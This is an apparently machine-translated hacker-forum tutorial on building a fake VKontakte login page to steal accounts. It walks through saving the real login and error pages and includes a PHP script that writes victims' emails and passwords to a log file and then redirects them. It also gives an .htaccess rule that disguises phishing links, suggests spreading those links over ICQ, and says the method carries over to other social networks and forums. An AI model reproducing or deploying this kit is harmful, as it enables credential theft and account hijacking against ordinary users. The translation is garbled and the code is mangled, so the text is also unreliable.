Fake in a hurry
[INtrO]
To do it was nothing, it was in the evening .... Actually, on my first article (the first one on anti-chat), I was pulled by the fact that in the section buy / sell / exchange / throw on a large there is a topic in which one hekker prodoval feyki already on 10 vmz, and often asked to create this or that fake ...I'll tell you one article as it is possible to play a universal fake almost everything that is hijacked! I will show on the example of fake vkontakte.
[SeaRchINg]
And so, 1 what we need is to choose the resource and collect all the information we need, but we only need a copy of some pages. We go to vkontakte.ru through Operu (!) . ZHmyakayem button input, we get on login.php, it and take for the index of our fake. We press in the opera: Fail -> Save as -> In the opened dialog under the name choose (by default there is a Web Archive ....) " HTML Fail with images ", and the graph is required File name write index (or login.htm - depending on the page)
Further we enter there unreal data and we get to the page on which it is written
This e-mail address is not registered or the password is incorrect.
We save it in the same way, only write bad instead of index . Next, we drive into Google.ru the phrase Vkontakte.ru, click Additional results with vkontakte.ru » and search for something related to the contact ero ... On the second page, I found VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- remember, we need this link
Усе, all that we need for feyka from the resource, we already have.
[CoDiNg]
Tax, now we will use the login form. Open our index.html and look for the login form.<Form method = "post" name = "login" id = "login" action = "login.php"> <Input type = "hidden" name = "success_url" id = "success_url" value = ""> <Input type = "hidden" name = "fail_url" id = "fail_url" value = ""> <Input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1"> <Table align = "center" cellpadding = 0 cellspacing = 7 border = 0 width = "40%"> <Tr> <Td width = "100px"> <Span class = "gray"> Email: </ span> </ Td> <Td> <Input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" /> <Td> </ Tr> <Tr> <Td> <Span class = "gray"> Password: </ span> </ Td> <Td> <Input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" /> </ Td> </ Tr> <Tr> <Td> & Nbsp; </ Td> <Td> <Input style = "margin-top: 1px; vertical-align: middle;" Type = "checkbox" name = "expire" id = "expire" value = "1" /> <small> Alien computer </ small> </ Td> </ Tr> <Tr> <Td> & Nbsp; </ Td> <Td>From here we memorize 3 things:
<Form method = "post" name = "login" id = "login" action = "login.php">
<Input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<Input class = "inputText" type = "password" name = " pass " value = "" id = "pass" size = "25" />
It is in these 3 things that the first part of the uniqueness lies, on any social network or emily, or elsewhere, everywhere the form of the entry (field) will be in this kind (well, only the names of the fields awaken), for example in classmates <Input id = "field_password" value = "" style = "width: 170px;" Type = "password" size = "20" name = " st.password ">
Ie just distinguish the name of the fields, design elements, but the function is the same for all. Now we create a php file, and we call it login.php , its contents:
PHP Code:
<? PhpActually look at the script, a couple of strings, but this is quite normal fake, its functionality:
/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "at" );
Flock ( $ f , 2 );
If ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ I " , $ _POST [ 'email' ]) &&! Empty ( $ _POST [ 'password' ]))) {
Fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'password' ]. " \ N " );
Header ( "Location: http: //" );
} Else {
Header ( "Location: http: //" );
}
Flock ( $ f , 3 );
Fclose ( $ f );
?>
Saving of transmitted variables, their verification, redirection depending on the verification.
And so, now we return to those 3 lines:
<Form method = "post" name = "login" id = "login" action = " login.php ">
Here we have everything in order, the name of our script matches the name of theirs, it does not coincide, then we replace it or we rename it. <Input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<Input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />
From here we need name = " email " and name = " pass "
We paste them into our script in the right place
<? PhpWho did not notice, it's $ _POST ['email'] and $ _POST ['pass']
/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "at" );
Flock ( $ f , 2 );
If ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ I " , $ _POST [ 'email' ]) &&! Empty ( $ _POST [ 'pass' ]))) {
Fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'pass' ]. " \ N " );
Header ( "Location: http: //" );
} Else {
Header ( "Location: http: //" );
}
Flock ( $ f , 3 );
Fclose ( $ f );
?>
Next, look at the script, then the function IF ELSE stands, and if it's the email field that matches the email ([email protected], and not how the message is sent), and the password field is not empty, then the first redirection is executed, but if the enamel does not match or The pass field is empty, then the second is the redirect. From this it follows that if the Chell entered a soap and something similar to a pass, then we throw it on the page with the eroy http://vkontakte.ru/blank.php?code=10 , and if I entered the garbage (here we needed it Copy of the page bad.html? When we entered the wrong data), then throw it back, Ie enter bad.htm.
PHP Code:
<? PhpWe save all the crap to the server (login.php, index.htm + folder with files, bad.htm + folder with files), create log.txt file (I advise my unique name to come up. Do not forget to change in the script), put on Him chmod777.
/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "at" );
Flock ( $ f , 2 );
If ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ I " , $ _POST [ 'email' ]) &&! Empty ( $ _POST [ 'pass' ]))) {
Fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'pass' ]. " \ N " );
Header ( "Location: http://vkontakte.ru/blank.php?code=10" );
} Else {
Header ( "Location: bad.htm" );
}
Flock ( $ f , 3 );
Fclose ( $ f );
?>
3) a small update ...
This update is very suitable for SI, at the root of the FTP create a .htaccess file with the following content:
RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -f
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]
ATTENTION!!!
! Index \ .htm- this redirect is referenced, if you have a fake login.html. Then accordingly you need to rename the index in the login.
Taks, this file gives us a link more qualitatively gasily, namely:
Yours / any text, if you know the link structure of the fake, for example, contact, we can do this:
Yourfake.ro/ photos.php? Act = show & id = 15884695_588954334 & uid = 359648756 & self = 6And vparit it on ICQ))) agree. Less visible now fake))
That's all
[THe eND] Actually that is unique, and the fact that you can go on to your classmates, also save the page, enter the variables, replace the URLs (I immediately give http://odnoklassniki.ru/dk?st.cmd=error) and everything, absolutely the same way Go on mayile.ru, save variables and replace and all))) The only thing you might need is creativity, we'll save not the main page, but the login page. You can also do any forum if you want to get acc ( Send to PM
<a href="file"> link to a topic </a>, And in the fake you specify this topic for the redirect.
Comments
When commenting on, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet, changes Not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.